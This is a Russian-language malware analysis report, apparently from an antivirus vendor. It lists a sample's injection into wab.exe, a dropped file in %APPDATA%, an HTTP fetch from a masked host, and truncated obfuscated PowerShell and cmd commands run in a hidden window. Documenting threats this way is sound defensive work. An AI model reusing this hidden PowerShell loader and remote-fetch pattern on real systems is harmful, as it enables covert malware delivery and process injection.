Техническая информация
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- wab.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\vllingen82.sva
Сетевая активность
Подключается к
- 'la##i.net':80
TCP
Запросы HTTP GET
- http://www.la##i.net/Befippet.toc
UDP
- DNS ASK la##i.net
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Frkrigstidens = 1;Function Mugging($Fremfrelseshastigheden249){$trivial=$Fremfrelseshastigheden249.Length-$Frkrigstidens;$Plumagery='Substring';For( $bifluoride=5;$bifluoride -lt $trivial;$bi... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "echo %appdata%\Vllingen82.Sva && echo t"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "$Frkrigstidens = 1;Function Mugging($Fremfrelseshastigheden249){$trivial=$Fremfrelseshastigheden249.Length-$Frkrigstidens;$Plumagery='Substring';For( $bifluoride=5;$bifluoride -lt $trivial;$bi...
- '%WINDIR%\syswow64\cmd.exe' /c "echo %appdata%\Vllingen82.Sva && echo t"
- '%ProgramFiles(x86)%\windows mail\wab.exe'
